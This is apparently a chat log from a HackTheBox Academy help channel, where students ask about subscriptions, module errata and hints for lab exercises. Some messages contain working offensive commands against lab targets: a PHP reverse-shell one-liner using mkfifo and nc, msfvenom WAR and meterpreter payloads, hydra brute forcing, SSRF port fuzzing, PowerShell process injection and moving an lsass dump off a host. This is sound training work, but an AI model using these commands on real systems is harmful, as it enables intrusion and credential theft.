#modules

then yeah, you should probably try what they taught about ssh.

I've stopped here too. Any hint?

I found a small typo that needs correction in one of the modules solution. Where should I report this ?

#1234357888114364508

#1234357888114364508 with the title of your post being the module and section name; the body being where and what it should be corrected to

i'm genuinely enjoying tackling AEN blind :)

Hi

what does testing if POST parameter 'xyz' is dynamic means in sqlmap ?

Is the vuln assessment module really 2 hrs?

Hello I have a question, I want to do the new path "Active Directory Penetration Tester". What is the best subscription to unlock all content?

@safe star @fathom pendant problem was the it was looking for proxychains.conf and the config was in proxychains4.conf. Copy pasted the whole thing and it was ready

Gold Annual

Is platinum monthly also a good option? You get vcubes by completing something right?

I think they deliberately made the two Tier 4 ad modules T 3 so Gold Annual can unlock the full path (Which is awesome move!)

I personally think that monthly is not worth it (other than student's sub ofc)

plat will only unlock 2 modules per month for you

i believe they did something similar for CWEE

Oh that is not worth it lmao, thanks for your answers!

if you ONLY want the ad pathway then it will cost you less since the cashback thing will pay for about 3 modules

Will probably get annually

I want to do more then only this path

Howcome the only way to do this Skill Assessment (AEAD #2) be through a method not taught in the module?

It's briefly talked about

It is talked about, but since they don't explicitly have you practice it, it's not on your mind

Alright but they mess with me. Spend 5 hours or something like that on this one question

Something about nightmares or potatoes, if you need a hint

Technically, the tools were given

But yes, I agree

Yeah thanks I mistakenly read a bit more about their convo so I know XD

academy favicon is borked or something

did anyone do the mssql, sccm skills assesment yet? i have a question / problem and idk if its a lab issue or mine?

feel free to dm me

The lvl of chat is to hight for me

How can I do privesc when I cannot write to disk?

Is there a C:\Temp directory?

Would someone be available about 'HTTP Attacks - HTTP Response Splitting'. The suggestions in this chat and those in the forum did not help me.

From the output it doesn't indicate. But I also tried to append it to current folder.

I also tried to see if I could navigate to the users desktop, documents folder etc. using cd but I don't think xp_cmdshell lets you navigate like that? Do you know

Could anybody help me? I'm on the footprinting lab - medium. I've managed to find credentials to log in to the SMB server as administrator. I don't really know what to do from here though. https://academy.hackthebox.com/module/112/section/1079

I need to 'Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer. '

There are five shares, four of which I can access as administrator, and one I can access as user 'Alex', which I have the password to. The one accessible by Alex just contains the password for the admin user.

You cannot change the current working directory within xp_cmdshell

Thank you dm sent.

'In SQL Management Studio, we can edit the last 200 entries of the selected database and read the entries accordingly. We also need to keep in mind, that each Windows system has an Administrator account.' is the hint, which makes me think I have to do something with an SQL database but I'm not sure what I need to do.

unable to kill/stop neo4j

check the logs or as an alternative pgrep -f neo4j and kill the process.

no output for pgrep

ah! The pid is in the second screenshot you sent.

In the c$ SMB share, there are files related to MSSQL. I'm not really sure what to do with them though. Also, I don't think there's an MSSQL service running on the host that I can try to connect to.

I sent a dm.

I am willing to get dumb question of the day if it helps me progress 🤦‍♂️ , I have been stuck on the DNS Zone Transfers section of Info Gathering - Web Edition for 2 weeks. is it beneficial to do the footprinting module before doing the Info Gathering one?

never mind I went into the footprinting one and its there, I suppose the easy modules are only easy if you do the pre-requisite module

I put PCI and it doesnt work??

you are close... needs the full acronym

PCI DSS I tried too

ah I missed the -

nice

Windows Privilege Escalation
User Account Control
Why does rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll or C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe executes only once, I mean if i catch this on my nc, then cancel session and start it again, nc wont catch antyhing even though i execute command

caught me too

Hi can i DM?

Are we having Issues now spawning academy boxes?

I'm kind of stuck on File Inclusion Assessment, I got into Admin panel able to read /etc/passwd but couldn't get RCE, can anyone give me some hint

Hello, would this be the best place to ask for help with a question I can't seem to work past from the Information Security Foundation module? Or is there another page that would be better to seek help? It's a pre-req I'm in for cpts.

nvm I solved it

Hello chat

For whatever reason, I just seem to not be getting the echo result for this question. Any help would be appreciated, thank you. Submit the echo statement that would print "www2.inlanefreight.com" when running the last "Arrays.sh" script.

can you link us? i mightve just done this

SSI or Local File Inlusion?

I already done it hehe

oh, good.

Hello, there appears to be a problem with the MSSQL, Exchange, and SCCM Attacks module SCCM Site Takeover II question 2: Connect to the shared folder \LAB-DC\SCCMShare\SCCMServer01 using the hash of SCCM01$, and read the content of the file flag.txt:

the soultion shown varies between the given command, the terminal output shown, and the command that actully works on the machine.

if somone that has figure that out or a mod or somthing can reach out i can provide Screen shots and show you what i mean 🙂

If I understanded your question you need to get the hash again, the hash that the module give you is not the "real" hash

Kinda late, but can’t u just use put a reverse shell there?

Relay -> secretsump -> connect to the smb with the hash

ye, but i get a socks conection to the sql machine, not the sccm01 machine, so when i dump with secrets dump i get the SQL machine hash instead of the one i need as shown in the writeup

Can you provide me the command?

Is debit card not available for student accounts ? I can’t found in payment method

it's available

Can i dm to you for more detail cauz i can’t find it

you will not if you are not using a student email or your email is not verified

I only found credit card

I am not sure ask support

in modules theylist skills like sql injeciton , AD, php, jS etc do we need to learn these skill like developer or just learn stuff like security wise only

reach out to support please

Sounds good, thank you 🙂

You're not too late :D Haven't solved it yet, but yes that is an option. Would you then do privilege escalation inside the revshell?

Gotcha. Maybe I should try and put it on the users desktop using the full path. What do you think?

why i cannot got the sub domain ?

https://academy.hackthebox.com/module/54/section/488

Hello, I am in pentester path, password attacks, password mutations. I used hashcat to create the mutated word list and I'm using hydra to brute force in ssh. It's taking soo long

Why is it is taking so long

I used -t 4 because otherwise it would say thread aborted or something like that

Some services can be slow. I don't remember the details of that lab, but are there any more efficient ways of leveraging those username/password lists?

Can you eliminate half of the authentication problem by finding a usernames have reason to believe should be valid?

Colleagues how can I transfer a file when I have port 22 blocked between windows

What module/section are you on?

smb, file upload via http or using a c2 / metasploit with the download command

you can use "download" from evil-winrm too if winrm is open

Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop. Pivoting, Tunneling, and Port Forwarding// I'm trying to send the proxifier so I can route the host but I couldn't copy it to the other host

rdp is open?

yea I just finished that section. RDP is open and you can just copy/paste through the RDP session.

mkdir /tmp/tools
xfreerdp /v:<ip> /u:<user> /p:<password> /dynamic-resolution /drive:linux,/tmp/tools

Yes the room already gave us the username

move the binary to the /tmp/tools, open file explorer on windows with the rdp open and click on the drive, If you are on windows there is a advanced option that lets you map a drive

Has anyone solved the Sightless machine?

@solid quarry sei napoletano?

Shit, I was looking for ways to do it and it was only with the most basic jajajajaj

Nope, I'm from Brazil

z

Then perhaps there's another service that could validate accurate credentials which responds a little more quickly than SSH.

What is the cheapest and most effective way to secure cubes for this path if you don't want to pay for the platinum or gold subscription:

I think gold is the cheapest

hmm ...thought it was silver

yeah, but I don't think that buying silver one time grants you enough cubes

You have two options I think beside gold, buying silver and getting the extra cubes from the module (this will not get you all the modules for the path though) or you can spend $7100 to get the 7100 cubes

Hello team i have a problem in the module Active Directory Enumeration & Attacks (ACL Abuse Tactics) the problem is i need change the password for the user ´damundsen´ but when i launch "Set-DomainUserPassword -Identity damundsen -AccountPassword $UserPassword -Credential $Cred" give me this error "WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'" but if launch sharphound showme the damundsen in the domain, thanks a lot

hey guys does someone have a clarification ?

I don't recall any problems with that section. Without a doubt I solved this without metasploit. Did you forget to execute GO? I know there's a sql cli utility that requires it.

mssqlclient does the GO part automatically (which can be a pain)

Sometimes it's fixed by simply completely uninstalling and reinstalling it

I'm thinking of sqsh. I couldn't identify sqsh vs mssqlclient visually.

Well enum_db is a stored procedure in mssqlclient

hey guys. new to HTB. gonna be in here alot. just wanted to reach out. any suggestions for the modules?

Hi,

Module: File Inclusion
Section: Skills Assessment

So far, I have managed to read the source code of index.php and have pretty much idea regarding how the parameter is being handled. But I am not able to get out of the web root directory. I am not able to read even /etc/passwd file.

I have tried absolute path, URL encoded path with bypass for extension. I have tried creating too long payload to overflow certain bits. I have tried PHP wrappers. I have tried remote file inclusion, but nothing. I am running out of options now 😦

Start with info sec foundation skill path if you need to know the bare bones. else you could just start with
Networking -> Linux -> Windows -> Bash (and potentially learn a language like python)

People also say to do ftp but it's the same. I'm also trying smb with crackmapexec

Same thing, it keeps going for a long time with no login

thanks. i have started with the tier 0 modules. i know a little but not enough to be comfy yet. currently working on linux fundamentals and already seeing some places i need to spend some extra time.

good luck then

thank you. ill try not to annoy anyone too much lol

Hey guys, had anyone finished the windows lateral movement SA?

a number of people have finished it

I guess so, the real question should be is anyone here?

if you're looking for help, just ask your question and someone may answer

??

my bad did not wanted to pollute with a big ass message if no one can answer as of now

better to ask than never. that's what this channel is for

you can always ask again if no one answers after some time

did u get this solved? have you tried fuzzing for vhosts?

If anyone has the same problem

I am still in that module

nice, did u try fuzzing vhosts?

The module has not yet taught about vhost.

how to get access to the general offtopic

enlighten me exciton

oic i misunderstood your question, i see you have some subdomains listed, is the one you're looking for not there?

maybe try a diff wordlist?

read #rules and #welcome

The worldlist i used same with the example from that module

sometimes variations exist, try ...top1million-10000.txt or w/e its spelt as a sanity check, doesnt take long

don't hesitate to ask questions. just follow this guide: https://dontasktoask.com

pretty sound advice. ill keep that in mind.

In the forums people say to use ftp, I even used the same exact command that other people used but it finished and didn't find anything

I'm afraid i'm away from my notes right now. I can try to fire up the challenge to test myself. Is this Password Attacks > Password Mutations?

Are you still hitting SSH? I really don't recall which service returned results for me. I know some were slower than others though through that whole module.

Hi guys, did anyone have some trouble in using mimikatz in the PtT from Windows section of the academy?
I'm using thet TGT extracted with mimikatz but seems like I can get it to work with Rubeus but not with mimikatz for some reason.

I suppose I'm doing somethnig wrong at that point, but I can't get what lol

Yes password mutations

I tried ftp, ssh and smb

I've been trying a bunch of things since the first message abt this

if it's exactly the same and it doesn't work, try resetting the target

Hi, I'm starting with Penetration Tester PATH.
In all the modules there is a ‘Cheat Sheet’ button but when I touch it it does nothing. Is this because the module doesn't have it or is it just a bug?

if it has a cheat sheet button then it should be there

Ive been on it for hours, it resetted on its own multiple times

SMB is a clear winner here as far as speed goes.

Thanks, I tried disabling the addblock and it worked, I guess that was it.

I did that too

Is the vuln assessment module really 2 hrs?

Ok. I have the solution. Do you want to share the command you're using to brute force, or the output you get? We can do here or my DM's are open.

Do you still need help?

it's really not much to do aside from read how to use the tool; connect to the target hosting the tool; analyze the pre-scanned reports

Alright alright saw the pages it had alot of content that's why

some of the content is just screenshots

¯_(ツ)_/¯

I made the mutated password list with the command provided by the room, then I tried

hydra -l sam -P mut_password.list ssh://10.10.10.10
Then I did the same thing with ftp
Then I changed the custom.rule to exactly what was written in the room and did everything again.
Then I tried to enumerate smb with crackmapexec with both the mutated password file that I created the first time and also the one on the second time and that kept going on for hours. Then someone in the forum said to ensure that the file is sorted and there's no duplicates and I did this
sort -u mut_password.list -o 1_password.list
And then I tried to run hydra for ssh and ftp and crackmapexec for smb again and still didn't find the password

The target reset so many times

you only need to use the custom.rule given by the resources

not the one as written in the example

ftp should crack it

ssh is DREADFUL to work with

you can also use more threads

~48-50 is the most stable

more than that tends to drop connections

FTP should work fine too, but I had success with crackmapexec / SMB

This is why my output looked like. Can you run CME again (or NetExec its replacement) and compare?

Crackmapexec looked like that

Can you screen shot it?

can't share screenshots, their account isn't linked

Humm.. ok. I'll bet there's some deviation though.

Dm

sendit

i'm doing the test section of shell and payload module i already rdp to host one and found tomcat webpage and logged in and created .war payload with msfvenom but its not working any idea what to do ?

did you set the right lhost?

:)

i think you mean the 172.16.1.5 i also used the HTB target ip both didn't work

the right LHOST is the 172 one

as that's the one that matches the target ip

yup thats the first one i used "msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.15 LPORT=4444 -f war > test.war"

dude, i'm having the same issue. did you resolve it?

i’m thinking it might be an issue with the recent update to burp? it ended up working for me in pwnbox which isn’t updated

i also tried metasploit using tomcat_mgr_upload same thing its not working i'm out of ideas

Hello, im working on the module, Detecting windows attacks with splunk, but when i tried to open the splunk on my vm or the pwnbox im getting the same error, The connection was reset, does anyone know if there is a problem with the vpn or with this exercise Detecting RDP Brute Force Attacks,

On the final assessment of Command injection i cant figure out how to bypass getting a 302 error

my payload is GET /index.php?to=&view=2561732172.txt(injection operator)id

you’ll get it 👍

me: why tf can't i connect
me 5s later: 🤦 not connected to vpn

back to not getting it

I am using & as inject operator but it doesnt give me id

perhaps that's not where you should inject

try all different functions of the website too

that looks like the copy feature?

the hint pointed to the this one

ah ye

try injecting at a different point in the command

im unable to start target machine on https://academy.hackthebox.com/module/263/section/3084. anyone have same issue ?

also url encoding may be helpful

just found a third parameter

its worked i got no clue how or why i used port 9001 and change the name of the payload to a different name and it worked

The msf tomcat honestly is just mid

Faster to just do it yourself

it worked using "msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war > last1.war" i got zero clue why this worked maybe it liked the shell name "last"

If anyone has completed the windows lateal movement skill assess, I would gladly accept a hint for the second question.
If I'm getting this right i need to connect to the ||pswa on wsus.
i used proxychains with firefox and I'm able to connect on http://wsus/pswa but it only displays a black screen. and the https on port 8443 keeps timing out.||

any help will be appreciated

Hey, just doing SSRF lab, I see there is a simple way to get the flag instead of using gopher...
Do I miss something? or lab has issue?

verification

Sorry?

I saw in the guide said that I need to verify my email address, but I don't know if it requires any special operations.

Maybe is already done

that's a confirmation email sent to your email you signed up with

Oh,thanks😊

Hi i actually came across one vulnerability related to jQuery UI xss but not sure where to upload the payload to check whether it is working or not. Can anyone help me on this?

jQuery UI 1.12.1 - and payload is .checkbox("refresh")

what academy module is this related to?

Why is hashcat module not a part of cpts?

This is not a model it's a personal project, which my friend created and want me to test it

because the hashcat modes and such that are used are explained in the module itself

well it doesn't belong here you can read and follow #welcome to access #web

You mean explained in the password attacks module?

Is that what your saying?

Great

Or in cpts path they explain plenty of hashcat?

I’m confused as I don’t see why that would mean hashcat does not deserve a cpts module

For it to be explained in hashcat module

Unless you mean cpts includes everything I need to know about hashcat

they explain what you need to know

the hashcat module is very generic in the use cases; whereas the uses that are explained within the various cpts modules are specific; NTLMv2, TGS ...

the modes you see throughout the cpts modules are what you'll generically see in the environments

Ok I see now

a short sidenote for *2john, in some cases the hashses can be valid for hashcat it's just prefixed with x:HASH so you can just cut out the first bit

the most basic syntax that you'll ever need is:
hashcat -m <mode> ['hash' | hashfile] <wordlist>

you can find a whole list of modes https://hashcat.net/wiki/doku.php?id=example_hashes <-

so if you know what it is but forgot the mode that's useful

some hashes have unique signatures

like tgs you'd see $krb5tgs$23$ (you'd generally get TGS from kerberoasting)

Easier/quicker to use the site

Hello, i'm new here I just wanna know im I obligated to use the linux terminal included on the HTB site or I can link it with another linux simulator

you can just use your own vm

okay thanks bro

im stuck on a module https://academy.hackthebox.com/module/90/section/941 How many types of evasive testing are mentioned in this section? i answered the question with the answer but it doesnt work

you probably have a space in the answer

i removed the space

then u put the wrong answer

3

smh

My box for Public exploits it's loading up. Is anyone else having this issue or should i try a different browser? currently using firefox

Yo

disregard, i fixed my issue

anyone have trouble setting up the socat redirection reverse shell in the pivoting, tunneling module? I have tried like 8 or 9 times now and cannot get a call back. Following step by step

no i don't recall any issues

I feel super-duper awkward in the pivoting assessment. Any word of advice other than do it a dozen times to get used to it... then do it another dozen times with ligolo?

just do it once with at least 2 tools

you won't always have access to some tools but ligolo (generally) hasn't failed me

Hey, I'm going through the Password Attacks module and the Password Mutation exercise is taking forever. I have spent the last four evenings and have gone through close to 10,000 password attempts with Hydra. Am I doing something wrong?

don't attack ssh

and use moar threads

I tried to do more threads, but I think there was an issue because I was attacking ssh, which was an assumption on my part. Okay, I'll use one of the other services to brute force the password

Thank you!

So I am in the PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment on question #4. I have the lsass.dmp file, but I am stuck on how I can get the file from the rdp session to my attack box, both webadmin and my attack box are not ping-able. I used the meterpreter lesson to establish a connection to the rdp session

there are many different ways. if you're using rdp you can simply share a drive.

that was the first thing i tried with smb and ftp, but the two ips are not reachable

C:\Users\mlefay\AppData\Local\Temp>move lsass.DMP \10.10.14.63\CompData
The network path was not found.

/drive:drivename,/home/directory

use xfreerdp

i'm going to need a little more detail than that, unfotunately

which vm u are using kali?

the pwnbox

xfreerdp /v:ip /u: /p: +clipboard /drive:fileshare,/home/htb

i believe meterpreter has an upload/download function

i mean it is fairly clear tbqh

just replace drivename with whatever you want to name it and /home/htb with the full or relative path of the directory you wish to share

for instance i have a resources folder with all my tools to transfer at /home/marcielee/htb/resources <-- that's the full path i specify every time

xfreerdp does not expand things like ~

so in this case ~/htb/resources is not the same

even though normally you can cd to it

I appreciate the help. My session died and it appears the spawned box firewall is blocking my access now, so I think I need to start all over, which is going to take a while

I don't recall a firewall being on this

ya you're right, the box just timed out lol

Please help

Yes

look closely at the source code

Hey can anyone help me with Attacking Common Ports (DNS) part?

i have tried everything here doing subdomain brut forcing with subbrute and then use dig axfr command but did not get anything

did you find subdomains?

Solved lol bruteforcing is worst

Got it.

Hey,
Im on the Serverside attacks module and im having trouble on the first exercise. I'm using ffuf and my request isnt returning anything, does anything here look wrong?

I also did this, it gave me too many returns to be true though

im so sorry i said "could not" instead of "failed to" 😭

you're supposed to be finding a local service running on the host

oh, why would something be running on the host? I thought this was pen testing a website hosted elsewhere

so which IP address can you use to check for services running internally

172.17.0.1

right?

the whole idea of SSRF is that by leveraging a feature of a web app that makes outgoing connections to other web apps, you can control where the connection is being sent to enumerate other services, including ones running locally on the same web app you're testing

try and see for yourself

So the local ip is what im supposed to be fuzzing, correct?

because im looking for open ports

ffuf -w ./ports.txt -u http://10.129.141.98/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://172.17.0.1:FUZZ/&date=2024-01-02" -fr "Failed to connect to" so something like this

ffuf -w ./ports.txt -u http://172.17.0.1/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb:FUZZ/availability.php&date=2024-01-02" -fr "Failed to connect to" nvm this seamed to return 3306 as an active port which is what the module says is supposed to happen

I have no idea what to do with the 3306 port, module doesnt explain very well, can someone explain to me

you are sending a POST request with a data parameter on a web server that's vulnerable to ssrf. the fuzzing command finds ports that are accessible to the server internally.

its all in the module, what other command did you use besides ffuf? there's only one other i think

just like you could reach your netcat listener you can reach internal ports

For the "File Inclusion" module, all the questions are based on PHP application. Is it more common for PHP applications? How likely is it to find applications written on other languages vulnerable to LFI?

Also, how loading .php files eventually gets executed, giving us control, does it happen for other languages as well?

As stated throughout the module the base concept remains the same for many frameworks

Taking example of python application(django), the endpoint is not a file, but a function. So, I don't quite get it how we can exploit them.

Django is a database thing yeah?

Django is a python framework to bootstrap web application.

I just checked the intro section again. It states that "execute" is allowed by a limited functions, which makes sense. Most of it is reading system files.

it says its wrong

Im a little confused

So, what we did in the exercise (RCE) is the absolute extent of the damage that LFI can do adn we should not expect that in general, but just reading files?

Yeah a lot of code bases have some form of exec function

Don't discount file reading

Sometimes you can find exposed creds in a config file

its also got this

That's not host 1

where can I find host 1 this is a little confusing

Read the whole mission brief to see what host 1 is

U can look at some django lfi cves for a better understanding

I have it says "Hosts 1-3 will be your targets for this skills challenge. " and nothing much than that on how to find host 1

can anyone tell me why i cant write in general

Read the whole page

Read and follow #welcome

oh

Doesn’t the module show how to find live hosts?

I can’t remember

Also as a note firefox is there on the foothold

im on the skills assessment and its not really showing

The assessment literally gives them to you in the whole mission brief (page)

Oh yeah

It's literally there on the page

Ctrl-f for host

still i cant write in gen

it doesnt say anywhere ctrl f on the page that I see

Well did you follow the verification instructions, or copy/paste what's shown without thinking

I meant ctrl-f on the skill assessment page

Not on the foothold you're on

ahh mb

This assessment has you sat on a foothold targeting an internal network of hosts

i am confused because this assessment says that we cant access the hosts anywhere outside the foot hold, then says "if we browse to the ip:8080"... but it doesnt connect to it when I try to browse to it on my own kali and also theres no firefox on the xfreerdp

Yes there is

Type it in the terminal

ahh yes I didd that...i wonder why it wasnt on the desktop

thank you

Because silly

(Irdk, might have to submit an erratum for that )

...

That's not the internal host

The ips in the mission brief aren't placeholder

Internal == not 10.129.x.x

Im sorry im still confused 😅

and I assume we exploit everything from this xfreerdp and dont use our own vm (as the xfreerdp has msfconsole and nmap too)

yes

Indeed

ok cool

Read the engagement carefully

the rdp machine is on 2 networks

I mean you could get fancy if you want and pivot but it's really not necessary

As everything you need is right there

wouldve been so much easier if i knew how back then

okay cool

You're telling me bud

thankfully I have u guys 😄

For now I'm gonn get cpts then leave

😮

u joking 😅

You shouldn't have to rely on others to be your brain

yeah Ik but it helps for the advice

Ye

is the internal ip 127.0.0.1?

Nope

ahh ok

Also

ohh I see let me try

the engagement gives you the ips/fqdn

And don't forget the creds on the desktop since you looked already

It's like the other most overlooked thing

ok let me have a look

found it

172.16.1.0/23

now I just have to sweep the subnets from mask 0 to 23 to find the right subnet right?

you can, but marcielee said 3 times already that they give you the ips in the engagement letter

ahh just saw the pictures now

😂

thank you

ahh needed to get rid of the s

Not https btw

yeahh thanks

99ish% it's http

ahh ok

Hi i found a vulnerability for host 1

how can I download it and run it in msfconsole?

||this should already be in your modules dir.|| try searching it in msfconsole

ok hold on pls

ok found it..I just have to put the username, password and rhosts... hopefully it works

got this problem

anyone have any ideas? should I change the TARGETURI to "host-manager/html"?

you can try manually uploading

could u give me an idea on how I can do that?

like download the file, update the IP and port in it? have a listener and upload?

hacktricks has an example

Module: Password Attacks Lab - Medium
How can I download the file inside the share?
It seems to be a big file, so smbclient gives always the error: bparallel_read returned NT_STATUS_IO_TIMEOUT NT_STATUS_IO_TIMEOUT listing \*
mounting is also a problem, it hangs and does not move further

Anyone did the Introduction to Windows Evasion Techniques ?
I have a problem in the Static Analysis section. I did everything as I was supposed to do:

[09/10/2024 02:52:23] Checking...
[09/10/2024 02:52:23] C:\Alpha\Static\NotMalware.exe - OK - Undetected by Microsoft Defender Antivirus

And now, because the checks passed, the flag.txt should appear in the same folder, containing the flag, however this is not the case

hi guys im going through the "knowledge check" with the GetSimple website, I have added my php reverse shell code into the website, opened nc on my terminal and nothing happens

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <MY_IP> <9443> >/tmp/f") ?>

this is what im using

and nothing happens

not sure if you revshell will work , you can run it on your machine to make sure that it will work

i solved the assessment. There's no issue with Burp. We just can't copy paste file signatures manually unlike GIF8 etc.
This comment on forum helped.

hey guys im on the web fuzzing module and im really confused, I've ||found the /flag directory but i don't know how to submit that as an answer, ive tried alot and im wondering if theres something else im supposed to be doing? I've file fuzzed both the given directory and the /flag directory with the seclist common wordlist with every recommended file extension...||

when doing "Window Privlege Escalation" moudles in the user privileges sections, I'm not seeing the privileges the modules are talking about when I do whoami /priv but I can use those privileges. Is this a error on my end or somethis else is going on?

nvm this user just doesnt have privileges SeTakeOwnershipPrivilege, strange

is the user not supposed to have the SeTakeOwnership for this lab?

Anyone doing Sightless rightnow?

try running cmd prompt as administrator

strange

idk why cmd works but not powershell

because i used cmd to run powershell...

you can also run powershell as administrator ig

hello everyone, new guy here 😅 I'm currently stuck at the skill assessment for the introduction to the windows command line, at the question no.8 "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. "

I've tried everything, searched every powershell module and member for user7, even run a script to find patterns such as "flag", "user" and "password" with no success.

Can anyone help me with this one?

ok so do you have an rdp session to the host up and going?

the domain joined computer, the one you're ssh'ing to the DC from.

<@&861185840277487616>

hi can anyone help me with " examining the logs located in the "C:\Logs\Dump" directory, determine the process that performed an LSASS dump". I've tried to filter by ID event 10 and build an XML query fitering for target user != source user but it doesn't work (bad query)

<QueryList>
<Query Id="0" Path="file://C:\Logs\Dump\LsassDump.evtx">
<Select Path="file://C:\Logs\Dump\LsassDump.evtx">
*[System[(EventID=10)] and EventData[Data[@Name='SourceUser'] and Data[@Name='TargetUser']]]
</Select>
</Query>
</QueryList>

have you tried examining/filtering the logs with power shell? do you remember that section from the earlier module ... windows fundamentals or some ish?

what did you filter by event id 10 with? event viewer?

yes event viewer

i'll try with ps

sec let me pull out my notes from the win logs section i'll get you a one liner

unless you're gosu ps user?

(im not)

no

ok two thigns that might be helpful, i think one is perhaps an alias of the other (dunno tho)

wevtutil /? and Get-WinEvent -ListLog* and of course man Get-WinEvent

some other stuff here... wevtutil qe Security /c:5 /rd:true /f:text <-- query events, wevtutil gli "Windows PowerShell" <-- gather log infos (theres an alias there i assume gli = gatherLogInfo

you'll need to modify those secondary cmds of course, to yuor needs but thats how they're used in practice

ok thanks, so there's no possibilty to do this via event viewer?

there could be im not looking at that module specifically but are you sure that the *.evtx file you're resourcing exists? have you found it in the file system?

as a sanity check have you filtered for IDs other than 10? or had it list all events, rather. do you see any info in the event viewer at all?

yes the evtx file is in the dir provided by HTB, i've filtered only for id 10 and try to filter with XML but the query seems bad

i'll try with the cmds you provide me

ok and you're sure that the evtx file HAS events in it right?

yes 14.344 events

sorry if that sounds silly, but sanity checks here. starting with a wide net and closing in kinda thing

yeah xml isnt my forte i'd try those two CLI event parsing cmds and see if you have better luck that route

i cant say anything about your xml query being correct but i would try the CLI tools then if you resolve it that way go back at the XML after to see what mightve been wrong if it still interests you

k ty

haven't tried rdp because what I understand from the question is that first I need to find the flag with the credentials for the domain controller on the first target host (user7) with ssh

can you link me i beleive i've completed this lab and have access still

https://academy.hackthebox.com/module/167/section/1633

oh ok this tripped me up too. the password is the answer from the previous exercise

did you realize that? @lusty cipher

the password for the ssh, yes

I connect to user 7, all good, then I search the powershell modules, and cant find the credentials for the domain controller

it only mentions "previous flag" in like the first exercise then never mentions it again so that kinda threw me for a loop

ok so we're on user 7 exercise?

yeap

the problem I have is that I run powershell on user7, search every module and member and cant find any usernames or passwords for the domain controller connection

just making 100% sure, this one right?

yeap, that's the one

Guys I don't understand how file uploads work
I logged in a windows host through remmina, I'm trying to exfiltrate lsass creds to my Kali VM but idk why the file isn't going there

Ok so you might want to DM me here because your current process may contain spoilers, if you're interested, DM me with the steps you've taken and the passwords you've tried so far so i can get an idea where you're at...

@lusty cipher ^

I need help with one question from the Skill assessment part of Info gathering. (What is the API key in the hidden admin directory that you have discovered on the target system?)
I have done all questions. only this one is remaining. I also found a hidden directory in the robots.txt file from one of the subdomains but when i open it, it shows connection error. What am i supposed to do here?

What module it is? Info Gathering Web Edition?

Yes

you have to either do directory bruteforcing or subdomain enumeration

I saw my answer but seems answer to an other question

Tip: try going deeper

ok finally 've found a solution.
Comments are not in eng but in summary -> define the path, extract event with ID 10, iterate and select suser!=tuser and finally print the process.
Scroll a bit through the process and found this process with unusual name (i don't write here the solution)

Definisci il percorso del file di log
$logPath = "C:\Logs\Dump\LsassDump.evtx"

Estrai gli eventi Sysmon con EventID 10
$events = Get-WinEvent -Path $logPath | Where-Object { $_.Id -eq 10 }

Itera su ciascun evento e stampa le informazioni
foreach ($event in $events) {
$xml = [xml]$event.ToXml()
$sourceUser = $xml.Event.EventData.Data[0].'#text' # Modifica lindice se necessario
$targetUser = $xml.Event.EventData.Data[1].'#text' # Modifica lindice se necessario
$processName = $xml.Event.EventData.Data[5].'#text' # Modifica lindice se necessario
Write-Output "Source User: $sourceUser"
Write-Output "Target User: $targetUser"
Write-Output "Process Name: $processName"
}

yes.

I have a question too. I'm doing Active Directory Skill Assessment Part 1 (https://academy.hackthebox.com/module/143/section/1278) , I can' find cleartext password of t***** account. I tried to hashcat NTLM hash but nothing, any suggest?

i've tried everything. I HAVE DONE ALL OTHER QUESTIONS. Only this one is left. I can clearly see the admin directory name in robots.txt but unable to access it.

DM me

bravo. did the ps cmdlets help you find what you needed? i havent done this module, curious what was the turning point.

hello guys. can you give me an answer for "Using the metasploit framework" module; "Introduction to Metasploit" section question: What command do you use to interact with the free version of Metasploit? There is no answer for this question in "Show Solution". I tried answer "msfconsole" but it didnt work.

i've search in the previous module as you mentioned before. That was the turing point

ah good deal, glad you got it sorted.

Try again

its working

watchout some spaces, remember to "trim" your answers

first time i faced this type of occasion. after a few tries it suddenly worked

thanks

Anybody can help me with this?

Someone should be active shortly who can help, sorry i cant help here.

Hello everyone, if someone is available I'd have a question about one of the the skills assessment question from the Security Monitoring and SIEM fundamentals

Guys I don't understand how file uploads work
I logged in a windows host through remmina, I'm trying to exfiltrate lsass creds to my Kali VM but idk why the file isn't going there

You can set up a shared folder using remmina

Backtrack to the File Transfer module if you're in the CPTS path. There are plenty of options available.

Hello, good afternoon. I’m working on the "ICMP Tunneling with SOCKS" academy problem. I read in the forum that you recommended deleting and making it static, which I did, but now when running "make" I get another error: "make: *** [Makefile:335: aclocal.m4] Error 127". Could you please tell me what I might be doing wrong?

Oh I've done.. reading online seems there's a registry flag of WDIGEST that has to be enabled

does anyone know how to fix this? used
msfvenom -p windows/x64/meterpreter/reverse_https lhost=x -f exe -o backupscript.exe LPORT=4444

tried both tcp and https -- no luck

target - windows. running the exe from the webshell

Im doing the:
Detection Example 2: Detecting Unmanaged PowerShell/C-Sharp Injection

I have copied the powershell commands they show in the lesson to showcase the unmanaged powershell injection. I changed the "Process ID of Spoolsv.exe" part to the actual process id. SO mine looks like this:
-ep bypass

Import-Module .\Invoke-PSInject
Invoke-PSInject -ProcId 2408 -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"

However the spoolsv.exe doesn't become managed? Why is this? It seems to jnust create another powershell process in process hacker? COuld anyone help m,e with this?

Also the 3rd part of this:
Detection Example 3: Detecting Credential Dumping

Just thought i'd mention that the lesson shows the executable name as "mimikatz.exe" but this is WRONG!!! It is called "agentexe" for some reason.

Try mimikatz or other tools

The example doesn't always mirror the practical

Im working on the SQLmap bypassing web app question 2 (case 9). I've put the uid parameter in randomize and each time I get try to use the output, I get BAD UID responses. Any idea what I need to change?

what does your command look like?

it worked for me

PS C:\Tools\PSInject> powershell -ep bypass

